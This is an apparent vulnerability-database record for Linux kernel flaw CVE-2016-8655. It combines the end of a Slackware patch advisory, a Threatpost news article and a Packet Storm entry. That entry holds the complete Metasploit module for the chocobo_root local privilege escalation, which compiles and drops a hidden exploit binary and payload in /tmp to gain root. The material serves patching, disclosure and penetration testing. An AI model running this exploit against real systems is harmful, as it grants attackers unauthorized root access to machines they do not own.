14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-generic-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-headers-4.4.38-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-huge-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-modules-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-source-4.4.38-noarch-1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/kernel-headers-4.4.38_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-4.4.38_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-generic-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-huge-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-modules-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/kernel-headers-4.4.38-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/k/kernel-source-4.4.38-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 packages:\n6546123d58d7747700d53b50254cd9ee kernel-firmware-20161211git-noarch-1.txz\n6d4ac49bddfe538504d34714e0bc1848 kernel-generic-4.4.38-i586-1.txz\nce4aa55e8c940c300df1ca47215a5df9 kernel-generic-smp-4.4.38_smp-i686-1.txz\nfdc3b1093f566c12733cf0fbdf50e897 kernel-headers-4.4.38_smp-x86-1.txz\n9f6f48199f75edd4d2bcfcbb734cc85f kernel-huge-4.4.38-i586-1.txz\n5ee68030a4e931150311d5a655d76597 kernel-huge-smp-4.4.38_smp-i686-1.txz\n0c21ed8ae016e9b35324269527ce65e3 kernel-modules-4.4.38-i586-1.txz\ne0317d4704c6f3739e255779aca0d71d kernel-modules-smp-4.4.38_smp-i686-1.txz\n3b819ecc1fbaeea79d91dab22d7cde30 kernel-source-4.4.38_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6546123d58d7747700d53b50254cd9ee kernel-firmware-20161211git-noarch-1.txz\n9e1f355c9f65488a44becf21f1b931c4 kernel-generic-4.4.38-x86_64-1.txz\n519a1736b1801a1436aacb60dc708e5e kernel-headers-4.4.38-x86-1.txz\n7a4652cae6fc2e705d023185b4a45b9e kernel-huge-4.4.38-x86_64-1.txz\n0b70933f764e704a431da0b19d6f37e8 kernel-modules-4.4.38-x86_64-1.txz\ndc5807d1a834de180c8b2348b9152b7f kernel-source-4.4.38-noarch-1.txz\n\nSlackware -current packages:\n6546123d58d7747700d53b50254cd9ee a/kernel-firmware-20161211git-noarch-1.txz\nbae8845ea023f5c1e851c1f503d59fa6 a/kernel-generic-4.4.38-i586-1.txz\n89d57e431a53d1f64a3dca8bb394411d a/kernel-generic-smp-4.4.38_smp-i686-1.txz\n157fe721649169ee32a845c57f09b243 a/kernel-huge-4.4.38-i586-1.txz\na5865a56c564375a53fa1a67b0d18655 a/kernel-huge-smp-4.4.38_smp-i686-1.txz\n78985fd9803ad187e3313a77a5d5f2ca a/kernel-modules-4.4.38-i586-1.txz\n7f684811388dfd1fc0f07437ad0136b7 a/kernel-modules-smp-4.4.38_smp-i686-1.txz\nf927f4c156198939f4157b03a2c646eb d/kernel-headers-4.4.38_smp-x86-1.txz\n1722ca0eb556fe87fad6ea020df8b32c k/kernel-source-4.4.38_smp-noarch-1.txz\n\nSlackware x86_64 -current packages:\n6546123d58d7747700d53b50254cd9ee a/kernel-firmware-20161211git-noarch-1.txz\n544940654f066dc357f3461cd01c3e50 a/kernel-generic-4.4.38-x86_64-1.txz\n7a5e5636fa10d12757c965a45df62f48 a/kernel-huge-4.4.38-x86_64-1.txz\nb17dcbbd71e810883a51017102be2bbe a/kernel-modules-4.4.38-x86_64-1.txz\n6a99f704b0a41ad060d84d94bc45d6b1 d/kernel-headers-4.4.38-x86-1.txz\n6143c34a575b42851eeae8f889a98a06 k/kernel-source-4.4.38-noarch-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.38-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.38 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.38-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.38 as the version.\n\nIf you are using lilo or elilo to boot the machine, you'll need to ensure\nthat the machine is properly prepared before rebooting.\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou'll need to run \"lilo\" as root to reinstall the boot loader.\n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition.", "modified": "2016-12-12T23:10:22", "published": "2016-12-12T23:10:22", "id": "SSA-2016-347-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.931787", "type": "slackware", "title": "[slackware-security] kernel", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:22", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "description": "A critical, local code-execution vulnerability in the Linux kernel was patched more than a week ago, continuing a run of serious security issues in the operating system, most of which have been hiding in the code for years.\n\nDetails on the vulnerability were published Tuesday by researcher Philip Pettersson, who said the vulnerable code was introduced in August 2011. A patch was pushed to the mainline Linux kernel Dec. 2, four days after it was privately disclosed. Pettersson has developed a proof-of-concept exploit specifically for Ubuntu distributions, but told Threatpost his attack could be ported to other distros with some changes.\n\nThe [vulnerability is a race condition](<http://seclists.org/oss-sec/2016/q4/607>) that was discovered in the af_packet implementation in the Linux kernel, and Pettersson said that a local attacker could exploit the bug to gain kernel code execution from unprivileged processes. He said the bug cannot be exploited remotely.\n\nPettersson\u2019s attack [opens a rootshell on Ubuntu 16.04](<http://seclists.org/oss-sec/2016/q4/621>); the exploit bypasses Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) protections at the kernel level. Both are features of Intel chips and hamper code execution in the kernel from user mode. Pettersson said the bypass happens because his attack does not use any userland memory in the exploitation process.\n\nPettersson provided a technical description of CVE-2016-8655 in an advisory published this week on the oss-sec mailing list:\n\n> \u201cTo create AF_PACKET sockets you need CAP_NET_RAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc). It can be triggered from within containers to compromise the host kernel. On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug.\u201d\n\n\u201cBasically it\u2019s a bait-and-switch, the bug allows you to trick the kernel into thinking it is working with one kind of object, while you actually switched it to another kind of object before it could react,\u201d Pettersson told Threatpost.\n\nThe vulnerability not only enables local code execution, but can also allow an attacker to crash a server.\n\n\u201cDepends a bit on the scenario, but the most common attack scenarios for local privilege escalations on servers are: 1) A web server gets compromised through a buggy webapp (usually PHP), the attacker gets low-privilege access and escalates his privilege to root using an exploit like this. 2) An attacker steals someone\u2019s login credentials for a server with many users, such as shared hosting server or a big university server,\u201d Pettersson said. \u201cThe attacker then escalates to root and gets access to everyone\u2019s accounts and can pivot further into the network.\u201d\n\nPettersson\u2019s bug is latest critical Linux issue to be addressed in the past few months. In mid-November, a vulnerability in the [cryptsetup utility](<https://threatpost.com/cryptsetup-vulnerability-grants-root-shell-access-on-some-linux-systems/121963/>) used to set up encrypted filesystems on different Linux distributions was found and patched. The cryptsetup vulnerability paved the way for hackers to retrieve a root rescue shell and gain access to data on the hard drive and either modify it or move it off the machine.\n\nWeeks prior, the [Dirty Cow vulnerability](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>) surfaced, a nine-year-old vulnerability in the Linux copy-on-write feature that also enabled root privileges for a local attacker. The kernel was patched Oct. 19 and in major distributions shortly thereafter. Google, however, got around to pushing a fix to handset makers in November and pushed a [patch this week](<https://threatpost.com/dirty-cow-vulnerability-patched-in-android-security-bulletin/122266/>) to its Nexus and Pixel handsets and to the Android Open Source Project.\n\nIn early October, a [systemd vulnerability](<https://threatpost.com/hack-crashes-linux-distros-with-48-characters-of-code/121052/>) was disclosed; it allowed attackers with local access to crash Linux distributions with just 48 characters of code. That flaw, researcher Andrew Ayer said, was introduced two years ago into systemd 209.\n", "modified": "2016-12-14T13:49:04", "published": "2016-12-08T09:15:57", "id": "THREATPOST:71B135B09C0B20493E1A02875B015BA4", "href": "https://threatpost.com/old-linux-kernel-code-execution-bug-patched/122336/", "type": "threatpost", "title": "Old Linux Kernel Code Execution Bug Patched", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-05-22T17:24:44", "description": "", "published": "2018-05-22T00:00:00", "type": "packetstorm", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-22T00:00:00", "id": "PACKETSTORM:147727", "href": "https://packetstormsecurity.com/files/147727/AF_PACKET-chocobo_root-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AF_PACKET chocobo_root Privilege Escalation', \n'Description' => %q{ \nThis module exploits a race condition and use-after-free in the \npacket_set_ring function in net/packet/af_packet.c (AF_PACKET) in \nthe Linux kernel to execute code as root (CVE-2016-8655). \n \nThe bug was initially introduced in 2011 and patched in 2016 in version \n4.4.0-53.74, potentially affecting a large number of kernels; however \nthis exploit targets only systems using Ubuntu (Trusty / Xenial) kernels \n4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as \nLinux Mint. \n \nThe target system must have unprivileged user namespaces enabled and \ntwo or more CPU cores. \n \nBypasses for SMEP, SMAP and KASLR are included. Failed exploitation \nmay crash the kernel. \n \nThis module has been tested successfully on Linux Mint 17.3 (x86_64); \nLinux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel \nversions 4.4.0-45-generic and 4.4.0-51-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'rebel', # Discovery and chocobo_root.c exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Aug 12 2016', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'chocobo_root.c' ], \n[ 'EDB', '40871' ], \n[ 'CVE', '2016-8655' ], \n[ 'BID', '94692' ], \n[ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], \n[ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], \n[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], \n[ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], \n[ 'URL', 'https://usn.ubuntu.com/3151-1/' ], \n[ 'URL', 'https://www.securitytracker.com/id/1037403' ], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ \nOptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \n] \nend \n \ndef timeout \ndatastore['TIMEOUT'].to_i \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nrm_f \"#{path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \nversion = kernel_release \nunless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ \nvprint_error \"Linux kernel version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Linux kernel version #{version} is vulnerable\" \n \narch = kernel_hardware \nunless arch.include? 'x86_64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \ncores = get_cpu_info[:cores].to_i \nmin_required_cores = 2 \nunless cores >= min_required_cores \nvprint_error \"System has less than #{min_required_cores} CPU cores\" \nreturn CheckCode::Safe \nend \nvprint_good \"System has #{cores} CPU cores\" \n \nunless userns_enabled? \nvprint_error 'Unprivileged user namespaces are not permitted' \nreturn CheckCode::Safe \nend \nvprint_good 'Unprivileged user namespaces are permitted' \n \nCheckCode::Appears \nend \n \ndef exploit \nif check != CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('chocobo_root.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx executable_path, exploit_data('chocobo_root') \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status \"Launching exploit (Timeout: #{timeout})...\" \noutput = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout \noutput.each_line { |line| vprint_status line.chomp } \nprint_status \"Cleaning up #{payload_path} and #{executable_path}..\" \nrm_f executable_path \nrm_f payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147727/af_packet_chocobo_root_priv_esc.rb.txt"}]}
